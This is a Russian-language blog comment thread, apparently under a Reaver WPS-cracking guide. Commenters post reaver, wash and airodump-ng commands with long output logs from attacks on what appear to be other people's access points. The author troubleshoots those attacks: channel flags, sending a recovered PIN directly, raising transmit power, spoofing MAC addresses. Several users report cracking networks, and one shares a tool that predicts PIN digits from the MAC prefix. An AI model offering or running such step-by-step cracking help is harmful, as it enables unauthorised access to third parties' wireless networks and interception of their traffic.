Realtek выпускает сплошь и рядом поганные чипсеты, но все же они спецификацию своих чипов открыли относительно не давно и то не полностью.
Пины и пароли выдаёт при повторном сканировании одинаковые.В данный момент после перезагрузки ноута завис на проверке удостоверения пользователя.Вроде,и к сети подключён-и зайти не могу.НЕ,хоть убейся-на 5 сек.идёт соединение,а потом разрыв.
Уважаемый Hub-lex,что Вы посоветуете в данном случае(моих два поста чуть выше)?Или,как Вы думаете-с чего бы это?
Посмотрите есть ли подключенные клиенты к АР.
User, прав частично. Скорее всего МАС-фильтр.
Может я не Hub-lex, но тем не менее. Может все что угодно быть. От отсутствия DHCP до элементарной фильтрации по mac-адресам.
Вообще пасс – не столько для того, чтобы на redtube.com заглянуть, сколько для того чтобы перехватить, что-нибудь вкусное. А там уже на пороге SSL (не 1.0) или TLS встречает Тебя…
Подскажите, что делать когда пишет такое?
[+] Associated with C8:3A:35:0C:47:C1 (ESSID: Tenda)
[+] Trying pin 00005678
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Могут быть 2 проблемы:
1. стоит МАС-фильтр
2. слабый уровень сигнала
Покажите команды и их вывод.
а как роутер взломать?
Будет скоро написано несколько статей на эту тему. Примерно в начале след. недели.
Приветствую! :-)
Наблюдаю такую картину. Всё сделал как описано автором.Выбрал АР и начал ломать.Но процесс шёл медленно,иногда совсем замирал и надолго.Решил ради интереса запустить второе окно терминала на предмет сканирования других АР и их параллельного взлома.(так,ради интереса!:-)) Мне выдало несколько новых точек и я уж хотел запускать reaver,но! В первом окне прогресс начал стремительно расти. Пока оставил всё как есть,т.е. в одном окне ломается точка за которую взялся изначально,а второе так и открыто на предмет сканирования других точек.Уважаемый Hub-Lex! Можно всё оставить как есть,или всё-таки закрыть дополнительное окно терминала? Или подбор будет идти неправильно? Жду ответа.Заранее очень благодарен!:-)
Оставьте все как есть.
Если проценты идут, значит все нормально.
Спасибо за ответ! Медленно,правда идёт,но идёт.Интересно то,что закрывая терминал на котором идёт сканирование ,останавливается и процесс на терминале взлома.Запускаю сканирование,стартует и взлом.Прошедший дождик кстати,на некоторое время ускорил процесс!:-) Буду ждать результат!
На скорость взлома влияет уровень сигнала, а также железо на АР и компьютере.
Абсолютно согласен.Перейдя по одной из Ваших ссылок,посетил иностранный сайт или форум.Там пишут,что иногда процесс может занимать до 4-ёх суток,а то и более.Но результат имеется.Так что ждуссс! И заодно уж ещё вопросик.Если на АР часто меняется канал,что сие означает? Просто при сканировании часто выдаёт то 1,то 9,то 6.Я не указал специально конкретный канал,предоставив reaver свободу выбора.Пока он справляется. Спасибо.
Спсибо за статью все работает у меня поучилось но он пароль смени по второй раз не могу это выдает вечно
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
Покажите какую команду вводите.
Если сменили пароль от wifi сети, тогда можно было бы послать пин еще раз.
p.s.: мне кажется, что еще и МАС-фильтр поставили =)
Усиливаем сигнал адаптера:
iwconfig wlan0 txpower 20-27
Всё работает, только адаптер сильно греется(чип Atheros). Так что сначала думаем, а оно надо?
Можно воспользоваться антенной с хорошим (15-20 dbi) коэффициентом усиления.
Ну а про нагревание адаптера, думаю все понятно.
Приветствую. У меня такая ситуация. Нашел сеть проверил ее командой WASH все ок. WPS не отключено. Использую сборку BackTrack 5 R2. Сигнал отличный уровень 80. Запустил взлом дошло до 70% и потом зациклился все время (часа 4) выдает
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Остановил взлом. На следующий день решил начать все сначала (сесcию не сохранял) и опять зациклился но уже с самого начала т.е. с кода 01234567 сразу
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Что делать помогите???
Покажите не только вывод, но и ввод. Какие команды вводили?
Владимир,попробуйте как я. Откройте ещё одно окно терминала и наберите wash -i mon0 –scan
При запуске терминала сканирования,начинает работать и терминал взлома.Так и работают в паре,один ломает,другой сканирует.Медленно очень,правда,но движется дело.Канал,на котором сидит АР не указывал,т.к. он периодически меняется.Всё как у автора.Терминал один
reaver -i mon0 -b хх:хх:хх:хх:хх:хх -vv
И во втором терминале
wash -i mon0 –scan
У меня работает.Надеюсь поможет и Вам.
вводил reaver -i mon0 -c 7 -b 00.00.00.хх.хх.хх -w
For User
Я и не говорил, что он лучший, я сказал один из лучших, что касается чувствительности приема, по сравнению с тем же самым RT8070/RT3070.
В Netgear wg111v2 чипсеты однозначно RTL8187, поэтому она и поддерживает работу с Reaver, не смотря на то, что находится в списке неподдерживаемых Reaver?ом карт (http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers), карт, но не чипсетов!
Посмотрел по поводу указанных тобой предпочитаемых Prism 2/2.5/3, они случайно не в этих картах: Zyxel AG-225H V2 и 60466178991 / 251082782619 ? Номера внеси в поисковую строку на Ebay.com
ZyXEL ZyAIR B-100, B-101, B-200, B-400 – точно на правильных чипсетах. Про Zyxel “AG-225H V2 и 60466178991 / 251082782619″ – сказать ничего не могу, но знаю что ZyXEL ZyAIR AG-200 (Atheros AR5523). Вот скажем совсем правильная карточка лежит: “SENAO PCMCIA WIFI CARD/NL-2511CD PLUS EXT2 /PRISM 2.5″ (там же).Prism 2.5 на борту, два MMCX-а, разумная цена ($15.53) – что еще надо?
Добрый день еще раз.
Я вчера задавал вопрос по влому и поскольку мне так и не удалось запустить в нормальный режим то сегодня привожу алгоритм всех моих действий и их результат
root@bt:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=19 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions.
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2911 dhclient3
2969 dhclient3
Process with PID 2911 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Unknown brcmsmac – [phy0]
(monitor mode enabled on mon0)
root@bt:~# airodump-ng mon0
CH 4 ][ Elapsed: 24 s ][ 2012-06-13 15:32
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
1C:7E:E5:45:CA:хх -60 203 0 0 7 54e. WPA2 CCMP PSK BezPoni
BSSID STATION PWR Rate Lost Frames Probe
root@bt:~# wash -i mon0 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
1C:7E:E5:45:CA:хх 7 -43 1.0 No BezPoni
^C
root@bt:~# reaver -i mon0 -b 1C:7E:E5:45:CA:хх -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 1C:7E:E5:45:CA:хх
[+] Switching mon0 to channel 7
[+] Associated with 1C:7E:E5:45:CA:9B (ESSID: BezPoni)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
[+] Nothing done, nothing to save.
root@bt:~# reaver -i mon0 -b 1C:7E:E5:45:CA:хх -c 7 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 7
[+] Waiting for beacon from 1C:7E:E5:45:CA:хх
[+] Associated with 1C:7E:E5:45:CA:9B (ESSID: BezPoni)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
[+] Nothing done, nothing to save.
root@bt:~# reaver -i mon0 -b 1C:7E:E5:45:CA:хх -c 7 -vv -A
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 7
[+] Waiting for beacon from 1C:7E:E5:45:CA:хх
[+] Associated with 1C:7E:E5:45:CA:9B (ESSID: BezPoni)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
[+] Nothing done, nothing to save.
root@bt:~#
И снова прошу помощи
Это все? Проценты идут?
Тут может быть несколько причин:
1. включен МАС-фильтр
2. не хватает сигнала
Что показывает? (сначала запустить reaver, а после команду ниже и показать вывод)
# dmesg | tail
Дело в том все так продолжаеться до бесконечности поэтому спустя 2 часа остановил. Менял МАС нечего не помогает, тоже зацикливаеться. Сигнал самый лучший
1C:7E:E5:45:CA:хх 7 -43 1.0 No BezPon
Попробую # dmesg | tail отпишусь.
А как еще можно обойти МАС фильтр?
А как ты обходишь МАС-фильтр?
Висят ли клиенты на АР?
Нет тогда когда сканировал не было. А обхожу просто меняю свой на любой другой
Владимир, если делайте как сказали. Тогда вы не понимаете, как строится защита МАС-фильтра. И как ее обходить.
Скоро появится подробная статья по этой теме. Если хотите узнать сразу, тогда skype => hub-lex-21
Приветствую. Интересная штука получаеться вчера запустил в очередной раз при тех же параметрах но дополнительно восползовался советом Серго
reaver -i mon0 -b хх:хх:хх:хх:хх:хх -vv
И во втором терминале
wash -i mon0 –scan
дело медленно но пошло. Потом отключил wash процесс пошел шустру на 1PIN 2секунды в таком темпе добрался до
[+] 77.25% complete @ 2012-06-15 01:22:19 (3 seconds/pin)
[+] Trying pin 84955678
[!] WARNING: 25 successive start failures
[!] WARNING: 10 failed connections in a row
[+] Trying pin 84955678
…
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last p
in
[+] Trying pin 84955678
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
и так до бесконечности
В связи с этим можно допустить что на АР нет МАС фильтра раз не банило до сих пор?
Ну и традиционно что делать дальше уж больно не хочеться сдаваться раз уже дошел то 77% осталось то совсем немножко.
Повторное включение wash в другом терминале результатов не дало.
Получилось!:-)))) Времени правда ушло около 60-ти часов.Действовал как и писал выше.Т.е. полностью как описал автор,плюс запустил ещё один терминал на сканирование.Часов за 56 достиг 50%.Затем резкий скачок на 90% и ещё часа через 4-ре финиш!Терпение и выдержка победили.Это работает,подтверждаю.
Хотел бы подкинуть страждущим, а они есть, одну тулзу: wpscrackgui_1.1.7-1_airubuntu. Зная первые шесть цифр mac-адреса, при определенном раскладе, она Тебе может выдать первые четыре цифры пина. Ну и соответственно процесс пойдет шустрее. Суть в том, что если первые шесть цифр mac-адреса одинаковые – то и первые четыре цифры пина у них тоже одинаковые (псевдослучайные числа). А вот с остальными четрьмя цифрами пина – пока сплошной туман. Ну и вводишь дальше по дефолту reaver -i monX -b X -p (то что она выдаст) – ну и enter ясен пень. 60-т часов – больно читать… Хоть я и не синтементальный чел., но все же… P. S. она не всесильна, но кое-что знает.
Не всмысле что: “шесть цифр mac-адреса одинаковые” . А в том, что есть определенное соотношение между первыми шестью цифррами mac-а (XX:XX:XX) – с одной стороны. И четырьмя первыми цифрами пина (0000) с другой. И на основании первых шести значенеий mac-а можно узнать первые четыре цифры пина, что конечто-же облегчает задачу…P. S. Я не писатель, и никогда им не был.
Приветствую. Прежде всего хочу поблагодарить за статью и поддержку. Благодаря общим стараниям мне удалось подобрать пароль к двум сеткам. Соттветственно следующий вопрос относительно смены МАС для работы в инете под Виндой 7.
Воспользоваться поиском – https://www.google.ru/#hl=ru&newwindow=1&sclient=psy-ab&q=change+mac+address+windows+7&oq=change++mac&aq=2&aqi=g4&aql=&gs_l=hp.3.2.0l4.0.0.1.189.0.0.0.0.0.0.0.0..0.0…0.0.6Oa-m6U_6fQ&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=428e5b25a23aa67&biw=1280&bih=578
Ну,это заметно,уважаемый User,что вы не писатель.Hub-lex уважаем и почитаем именно за то,что умеет правильно и толково подать материал по теме.Даже для абсолютных профанов,коих тут большинство!:-)))Вот из вашей абры-кадабры ничего толкового уяснить человеку несведущему очень сложно.А он очень мудр и терпелив абсолютно со всеми.Конечно,товарищи которые ленятся пролистать предыдущие коментарии вызывают некоторое раздражение.Так помогите им,а не выплёскивайте свой негатив.
Ну,да! Ну 60-часов! Но результат-то есть. И это главное.От 13-го июня почитайте мои записи.
Привет. Ломанул 2 сетки но на финише показывает только
[+] 92.87% complete @ 2012-06-16 15:57:39 (3 seconds/pin)
[+] Trying pin 16172074
[+] Trying pin 16172081
[+] Trying pin 16172098
[+] Trying pin 16172104
[+] WPS PIN: ’16172104′
и в другой также естественно PIN другой.
А вот долгожданного [+] WPA PSK: не дает.
ПОМОГИТЕ ДОЙТИ ДО КОНЦА!!!
Покажите полный ввод и вывод. Мне трудно оперировать этими минимальными данными.
Могу сказать, что пин подобран:
[+] WPS PIN: ’16172104?
Можно попробовать послать его напрямую:
# reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c x –pin=16172104
Хотел спросить, если: ” Мне трудно оперировать этими минимальными данными.” То. Возможно ли как-нибудь упорядочить, порой однотипные вопросы… Я так пролистнул: и тьма, сплошная тьма. Порой совершенно однотипные вопросы задаются (copy -past – нам поможет). Можно ли как-нибудь упорядочить …? Я конечно не истина в последней инстанции… P. S. однотипные порой, весьма однотипные вопросы задаются…
на след. неделе будет FAQ по Reaver. куда войдут вопросы из комментариев, сообщения из скайпа и т.п.
p.s.: главное чтобы в ВАШЕМ блоге все было упорядочено, а со своим я как нибудь разберусь.
Привет. Формат команды был таким
root@bt:~# reaver -i mon0 -b 94:0C:6D:FD:9A:16 -v -S -N -E
вывод очень длинный поэтому привожу фрагментально
[+] 8.94% complete @ 2012-06-16 15:08:08 (3 seconds/pin)
[+] Trying pin 09735675
[+] Trying pin 09745674
[+] Trying pin 09755673
[+] Trying pin 09765672
[+] Trying pin 09775671
[+] 8.98% complete @ 2012-06-16 15:08:32 (3 seconds/pin)
[+] Trying pin 09785670
[+] Trying pin 09795679
[+] Trying pin 09805675
[+] Trying pin 09815674
[+] Trying pin 09825673
[+] 9.03% complete @ 2012-06-16 15:08:57 (3 seconds/pin)
[+] Trying pin 09835672
[+] Trying pin 09845671
[+] Trying pin 09855670
[+] Trying pin 09865679
[+] Trying pin 09875678
[+] 9.07% complete @ 2012-06-16 15:09:12 (3 seconds/pin)
…
[+] Trying pin 16095670
[+] Trying pin 16105676
[+] Trying pin 16115675
[+] Trying pin 16125674
[+] Trying pin 16135673
[+] 14.75% complete @ 2012-06-16 15:44:49 (3 seconds/pin)
[+] Trying pin 16145672
[+] Trying pin 16155671
[+] Trying pin 16165670
[+] Trying pin 16175679
[+] Trying pin 16170001
[+] 90.93% complete @ 2012-06-16 15:45:08 (3 seconds/pin)
…
[+] Trying pin 16172029
[+] Trying pin 16172036
[+] Trying pin 16172043
[+] Trying pin 16172050
[+] Trying pin 16172067
[+] 92.87% complete @ 2012-06-16 15:57:39 (3 seconds/pin)
[+] Trying pin 16172074
[+] Trying pin 16172081
[+] Trying pin 16172098
[+] Trying pin 16172104
[+] WPS PIN: ’16172104′
ВОТ И ВСЕ.
Повторяю, пин подобран. Что выдаст эта команда?
# reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c x –pin=16172104
Здравствуйте. Прочитал вашу статью, пытаюсь хакнуть пароль, но сталкиваюсь с проблемой маленького сигнала… Процесс идет, но очень медленно, 5% примерно за 1-3 часа.
Я в общем пользуюсь внешней Вай фай точкой доступа усиленной мощности
2.4GHz High Power Wireless Outdoor CPE
Model No. TL-WA5210G (TP-Link)
(подключена через LAN порт)
возможно ли проводить действия через нее а не через адаптер в ноутбуке?
Здравствуйте Hub-lex! я так понял reaver не поможет если точка не поддерживает wps. подскажите пожалуйста где почитать про взлом без wps?
Здравствуйте. Да, верно. Почитать можно в Сети или здесь через некоторое время.
а через какое время?
На след. неделе наверное.
Здравствуйте. Прочитал вашу статью, пытаюсь хакнуть пароль, но сталкиваюсь с проблемой маленького сигнала… Процесс идет, но очень медленно, 5% примерно за 1-3 часа.
Я в общем пользуюсь внешней Вай фай точкой доступа усиленной мощности
2.4GHz High Power Wireless Outdoor CPE
Model No. TL-WA5210G (TP-Link)
(подключена через LAN порт)
возможно ли проводить действия через нее а не через адаптер в ноутбуке?
Все не осилил, мб был этот вопрос, но после команды “airodump-ng mon0″ как написано, я не вижу список доступных беспроводных сетей… Есть надписи BSSID PWR и так далее, но под ними пусто, SOS!!
Показывайте, что вводили и что получили.
root@bt:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=19 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions.
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
4023 dhclient3
4094 dhclient3
Process with PID 4094 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Unknown brcmsmac – [phy0]
(monitor mode enabled on mon0)
root@bt:~# airo
root@bt:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=19 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions.
root@bt:~# airmon-ng startwlan0
usage: airmon-ng [channel or frequency]
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
4023 dhclient3
4094 dhclient3
Process with PID 4094 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Unknown brcmsmac – [phy0]
(monitor mode enabled on mon0)
root@bt:~# airodump-ng mon0
CH 5 ][ BAT: 1 hour 20 mins ][ Elapsed: 16 s ][ 2012-06-23 13:38
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BSSID STATION PWR Rate Lost Frames Probe
root@bt:~#
покажите что выдает команда lspci
root@bt:~# lspci
00:00.0 Host bridge: Intel Corporation 2nd Generation Core Processor Family DRAM Controller (rev 09)
00:01.0 PCI bridge: Intel Corporation Xeon E3-1200/2nd Generation Core Processor Family PCI Express Root Port (rev 09)
00:02.0 VGA compatible controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09)
00:16.0 Communication controller: Intel Corporation 6 Series/C200 Series Chipset Family MEI Controller #1 (rev 04)
00:1a.0 USB Controller: Intel Corporation 6 Series/C200 Series Chipset Family USB Enhanced Host Controller #2 (rev 05)
00:1b.0 Audio device: Intel Corporation 6 Series/C200 Series Chipset Family High Definition Audio Controller (rev 05)
00:1c.0 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 1 (rev b5)
00:1c.1 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 2 (rev b5)
00:1c.2 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 3 (rev b5)
00:1d.0 USB Controller: Intel Corporation 6 Series/C200 Series Chipset Family USB Enhanced Host Controller #1 (rev 05)
00:1f.0 ISA bridge: Intel Corporation HM65 Express Chipset Family LPC Controller (rev 05)
00:1f.2 SATA controller: Intel Corporation 6 Series/C200 Series Chipset Family 6 port SATA AHCI Controller (rev 05)
00:1f.3 SMBus: Intel Corporation 6 Series/C200 Series Chipset Family SMBus Controller (rev 05)
01:00.0 VGA compatible controller: ATI Technologies Inc NI Seymour [AMD Radeon HD 6470M]
02:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)
03:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller (rev 05)
04:00.0 Unassigned class [ff00]: Realtek Semiconductor Co., Ltd. Device 5209 (rev 01)
http://umgum.com/debian-squeeze-lenovo-ideapad-s10-3
Все перечисленные действия нужно осуществлять с подключением к инету? Просто я БэкТрэк с USB запускаю, и запомнит ли оно все что я установил из дому?
Да, нужно быть подключенным к Сети. Остальные вопросы такой тематики ищите в Сети.
Доброго дня!
hub-lex скажи пожалуйста,что делать в данном случае-
reaver-i mon0-b xx:xx:xx:xx:xx:xx -vv
reaver-i:command not found
Спасибо!
Доброго, какой релиз BackTrack?
BT5R2-GNOME-64
reaver-i mon0-b xx:xx:xx:xx:xx:xx -vv
*пробел поставь между reaver и -i
Всего лишь?Надеюсь сработает!
Спасибо!
Тут не надо надеяться, надо просто пробелы поставить =)
кстати, между mon0 и -b тоже поставить пробел.
Извиняюсь за беспокойство,но нужны знания “профи”
Значит пробелы сработали и потекли такие строки:
[+]waiting for beacon from xx:xx:xx:xx:xx:xx
[+]switching mon0 to channel 1
[+]switching mon0 to channel 2 и так до 14-ти,после чего ничего не происходит.
Поскольку в твоей статье ничего не сказано про этот этап,нам остаёться лишь спрашивать у “профи”
Спасибо
хаха “профи”. идет смена канала. все что нужно, указать канал, на котором работает АР. Например:
# reaver -i mon0 -c [номер_канала] -b xx:xx:xx:xx:xx:xx -vv
То есть номер сети,которую взл.?
Следуют ли далее какие нибудь манипуляции?
Спасибо
Не номер сети (это как вообще), а номер канала. Покажи, что выдает airodump-ng mon0
Не знаю, у каждого по разному.
Скажи пожалуйста,что следует сделать далее.Я прождал несколько часов,но процесс(смотри ниже) не продолжился дальше.
root@bt:~# reaver -i mon0 -b A0:21:B7:FF:2E:12 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from A0:21:B7:FF:2E:12
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 11
[+] Associated with A0:21:B7:FF:2E:12 (ESSID: VOO-748274)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.04% complete @ 2012-06-25 17:55:40 (36 seconds/pin)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
reaving -i mon0[+] Trying pin 22225672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[+] Trying pin 33335674
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[+] Trying pin 44445676
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
